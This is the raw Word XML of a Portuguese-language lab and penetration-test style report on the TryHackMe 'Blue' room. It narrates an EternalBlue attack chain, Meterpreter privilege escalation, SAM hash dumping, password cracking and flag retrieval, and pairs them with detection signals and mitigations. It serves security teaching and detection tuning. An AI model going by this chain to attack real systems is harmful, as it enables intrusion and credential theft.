        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Saída do comando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whoami</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando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NT AUTHORITY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (elevação para SYSTEM).</w:t>
        <w:br w:type="textWrapping"/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14</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Migração de sessão Meterpreter para o processo PID 3036 (migration completed).</w:t>
        <w:br w:type="textWrapping"/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15</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Saída do Meterpreter: migração concluída e dump de hashes do SAM (Administrator, Guest, etc.).</w:t>
        <w:br w:type="textWrapping"/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16</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Quebra de hash NTLM e recuperação de credencial (usuário: Jon) via CrackStation.</w:t>
        <w:br w:type="textWrapping"/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17</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Imagem da sala do TryHackMe (contexto do lab / interface).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:widowControl w:val="0"/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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="46"/>
          <w:szCs w:val="46"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hws2y6t9nxf6" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interpretação</w:t>
      </w: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2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Confirmação da cadeia de ataque em laboratório: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SMB exposto → MS17-010 → execução remota → conversão para Meterpreter → interação → elevação a SYSTEM → hashdump → cracking (credencial Jon)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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2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Resultado: prova prática de risco, validação de detectores e identificação de gaps de visibilidade.</w:t>
        <w:br w:type="textWrapping"/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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cyydmw6mrupf" w:id="16"/>
      <w:bookmarkEnd w:id="16"/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Sinais detectados (positivos)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ProcessCreate</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> originado por executáveis em locais atípicos (ex.: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C:\Windows\Temp\*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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Criação/execução de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scheduled Tasks</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> por conta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SYSTEM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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Alterações em chaves de autostart (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HKLM\...\Run</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i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Conexões reversas (handler) com padrão Metasploit/stage.</w:t>
        <w:br w:type="textWrapping"/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Leituras/dump do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SAM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e I/O subsequente (hashdump).</w:t>
        <w:br w:type="textWrapping"/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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_94xpqkvfnoeg" w:id="17"/>
      <w:bookmarkEnd w:id="17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Gaps identificados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Cobertura de sensores incompletos em alguns segmentos (falta Sysmon/EDR).</w:t>
        <w:br w:type="textWrapping"/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Regras do SIEM com thresholds que geraram falsos-negativos (eventos correlados não elevaram alerta).</w:t>
        <w:br w:type="textWrapping"/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Visibilidade de rede parcial — nem todos os segmentos com captura (impede correlação completa).</w:t>
        <w:br w:type="textWrapping"/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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bdwc4w24all1" w:id="18"/>
      <w:bookmarkEnd w:id="18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Implicações do hashdump + cracking</w:t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2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Hashes locais permitem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ataques offline</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cracking/brute-force) e técnicas pass-the-hash.</w:t>
        <w:br w:type="textWrapping"/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Credenciais recuperadas aumentam imediatamente o blast radius e viabilizam movimento lateral e persistência real.</w:t>
        <w:br w:type="textWrapping"/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6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Exposição de contas privilegiadas é incidente de alta severidade.</w:t>
        <w:br w:type="textWrapping"/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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_90wf0hg75q22" w:id="19"/>
      <w:bookmarkEnd w:id="19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Mitigações prioritárias </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
      <w:pPr>
        <w:widowControl w:val="0"/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Imediatas (P0)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Isolar/quarentenar host(s) comprometidos.</w:t>
        <w:br w:type="textWrapping"/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Aplicar patch MS17-010 e desabilitar SMBv1 em toda a frota.</w:t>
        <w:br w:type="textWrapping"/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6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Preservar evidências: snapshots, pcaps, logs Sysmon/EDR.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BF">
      <w:pPr>
        <w:widowControl w:val="0"/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Curto prazo (P1)</w:t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Rotacionar credenciais locais/serviços possivelmente comprometidos.</w:t>
        <w:br w:type="textWrapping"/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Restringir criação/edição de binpaths de serviços e criação de Scheduled Tasks via GPO.</w:t>
        <w:br w:type="textWrapping"/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Habilitar LSA Protection / Credential Guard quando disponível.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:widowControl w:val="0"/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Médio prazo (P2)</w:t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Implantar cobertura Sysmon + EDR em todos endpoints; sensores de rede (Zeek/Suricata) nos segmentos críticos.</w:t>
        <w:br w:type="textWrapping"/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3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Automatizar playbooks IR (isolamento → snapshot → coleta → erradicação).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">
      <w:pPr>
        <w:widowControl w:val="0"/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widowControl w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_h3y942n3iqjs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2.4  Descoberta de Artefatos Sensíveis e Flags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Com os privilégios elevados já estabelecidos, a equipe Aegis Cyber prosseguiu para a fase de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">descoberta de artefatos sensíveis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> no ambiente da AtlasLogística. O objetivo foi simular, em condições controladas, como um atacante real buscaria arquivos críticos, credenciais ou indicadores de valor dentro do sistema comprometido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA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esta etapa, foram utilizados apenas comandos nativos do Windows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cd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), garantindo que nenhuma ferramenta maliciosa fosse introduzida no ambiente. A simulação concentrou-se na leitura de arquivos de texto contendo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flags de comprovação</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — representações seguras de dados que seriam sensíveis em um ataque real, como senhas, chaves de configuração ou documentos administrativos.</w:t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widowControl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yk4lrg1c97r5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Técnica, Laboratório e Adaptação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widowControl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agwl0rp4giie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Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD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Descrever as técnicas simuladas para descoberta de artefatos sensíveis (flags) em um host Windows comprometido, o ambiente laboratorial utilizado para reprodução didática (TryHackMe: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) e as adaptações aplicadas para garantir segurança, auditabilidade e conformidade com os objetivos pedagógicos do exercício.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widowControl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zkpdccgwfs7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Técnica (vetor, pós-exploração e descoberta de artefatos)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Vetor primário</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A sequência de ataque reproduzida baseia-se na exploração remota de um serviço SMB vulnerável (vulnerabilidade MS17-010 / EternalBlue) como vetor inicial para obtenção de execução remota no host alvo. A exploração viabiliza a abertura de um shell ou sessão remota, que, em um cenário real, permitiria ao atacante executar comandos e sondar o sistema (corresponde a técnicas MITRE como T1190/T1210).</w:t>
        <w:br w:type="textWrapping"/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Pós-exploração</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uma vez com sessão ativa, as ações simuladas focaram em elevar o contexto de execução para privilégios administrativos (elevação para SYSTEM), estabilizar o foothold (migrar sessão para processo mais estável) e coletar artefatos de alto valor, como hashes do SAM. Essas atividades representam classes de técnicas de pós-exploração (elevação de privilégios, coleta de credenciais e manipulação de tokens — por exemplo T1068, T1003, T1134).</w:t>
        <w:br w:type="textWrapping"/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Descoberta de artefatos sensíveis</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> A etapa final da cadeia simulada consistiu na busca por arquivos indicadores (flags) em locais estratégicos do sistema:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:widowControl w:val="0"/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Raiz do sistema</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — artefato que confirma o compromisso inicial do host.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">
      <w:pPr>
        <w:widowControl w:val="0"/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Diretório de configuração do Windows (config/SAM)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — artefato associado a dados de credenciais e configurações críticas.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D4">
      <w:pPr>
        <w:widowControl w:val="0"/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Diretório de documentos do usuário administrador</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — artefatos que simbolizam informações administrativas valiosas.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> A descoberta destes artefatos foi efetuada com operações de inspeção de sistema de arquivos e leitura de arquivos (comandos nativos do SO), de forma a produzir telemetria útil ao SIEM/EDR sem introduzir binários maliciosos.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widowControl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hekqxss185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Laboratório (configuração, ferramentas e fluxo reproduzido)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Ambiente</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O exercício foi reproduzido em um laboratório isolado e intencionalmente vulnerável (TryHackMe: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue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), usando VMs imutáveis/snapshots para garantir reprodutibilidade e limpeza entre execuções. O laboratório fornece um cenário guiado de aprendizado com uma máquina Windows configurada para demonstrar a cadeia SMB → exploração → pós-exploração → descoberta de flags.</w:t>
        <w:br w:type="textWrapping"/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Ferramentas e artefatos de validação</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D8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Ferramentas de reconhecimento: varredura de portas e identificação de serviços (varredura passiva/ativa com ferramentas padrão de laboratório).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9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Ferramentas de teste em ambiente controlado: frameworks/ambientes de ensino (Metasploit/AttackBox no contexto educacional) para validar a possibilidade de execução remota e gerar telemetria.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA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Coleta de evidências: snapshots de VM, captura de tráfego (pcap), logs de host (Event Viewer/Sysmon) e registros do framework de testes, usados para validar regras do SIEM/EDR.</w:t>
        <w:br w:type="textWrapping"/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Fluxo geral (reproduzido em laboratório)</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC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Identificação de host e serviços SMB expostos (portas típicas do Windows).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD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Validação controlada da possibilidade de execução remota contra o serviço vulnerável — apenas para gerar telemetria e confirmar vetores, sem persistência ou dano.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE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Elevação controlada do contexto de execução (metodologias suportadas pelo ambiente de ensino) e estabilização da sessão para coleta de dados.</w:t>
        <w:br w:type="textWrapping"/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Extração de indicadores e verificação de artefatos (busca por arquivos de verificação/flags em locais estratégicos).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:widowControl w:val="0"/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Preservação e documentação das evidências coletadas (prints de tela, logs, pcaps e listagens de arquivos).</w:t>
        <w:br w:type="textWrapping"/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widowControl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qdmy83ruc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Adaptação (segurança, pedagogia e restrições aplicadas)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Não uso de amostras maliciosas reais</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Todas as ações que simulam comportamento malicioso foram realizadas com payloads e técnicas não destrutivas ou instrumentadas para geração de telemetria somente. Em nenhuma fase foram aplicados binários de ransomware real ou estratégias de criptografia destrutiva.</w:t>
        <w:br w:type="textWrapping"/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Controles operacionais</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O laboratório utilizou snapshots antes/após execuções, redes isoladas (sem conectividade externa irrestrita), limites operacionais explícitos (sem persistência em VMs permanentes, sem movimento lateral para outros ambientes de produção) e logs completos para auditoria. Esses controles permitem reverter alterações e analisar o comportamento gerado sem risco para ambientes alheios.</w:t>
        <w:br w:type="textWrapping"/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Foco pedagógico e reprodutibilidade</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> O room </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> guia o estudante por etapas que facilitam a geração de telemetria observável (ProcessCreate, conexões de rede, leituras de arquivos sensíveis), permitindo validar regras de detecção e playbooks de resposta. Algumas adaptações praticadas no laboratório incluem: reinicialização das VMs quando artefatos temporários desaparecem, uso de snapshots para retornar o estado limpo entre tentativas e execução repetida das etapas para calibrar assinaturas/limiares do SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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widowControl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psczw9esw4e2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Busca pela Flag 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7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 raiz do disco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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), foi localizado o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag1.txt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86200" cy="1266825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18 – Falha ao localizar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flag1.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante verificação de artefatos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA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19475" cy="12954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19 – Exfiltração da flag: saída do comando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type flag1.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostrando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flag{access_the_machine}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EC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/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flag1.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> revelou o conteúdo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flag{access_the_machine}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, simbolizando o primeiro marco da exploração: o acesso inicial à máquina.</w:t>
        <w:br w:type="textWrapping"/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leitura dessa flag (Figura 18 e Figura 19) confirma que o invasor já possui controle suficiente para manipular o sistema de arquivos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widowControl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beaephzfr6nf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Tentativa em System32 e Descoberta da Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0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 sequência, a equipe tentou acessar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flag1.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> dentro do diretório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C:\Windows\System32</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figura 18), mas o sistema retornou a mensagem </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The system cannot find the file specified</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Essa tentativa evidencia a exploração de diretórios críticos do Windows, comum em ataques reais.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1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7650" cy="117157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20 – Conteúdo de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C:\Windows\System32\config\flag2.txt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Apesar da ausência da flag nesse caminho, ao investigar o subdiretório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C:\Windows\System32\config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi encontrado o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag2.txt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6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C:\Windows\System32\config\flag2.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> revelou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flag{sam_database_elevated_access}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figura  20).</w:t>
        <w:br w:type="textWrapping"/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2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Este artefato representa o acesso elevado ao </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SAM Database</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, reforçando o risco de exposição de credenciais locais quando privilégios administrativos já foram obtidos.</w:t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widowControl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zvcmnn6okry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Descoberta da Flag 3 nos Documentos do Administrador</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Explorando diretórios de usuários, em especial o perfil </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Jon</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, foi identificado o arquivo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag3.txt</w:t>
      </w:r>
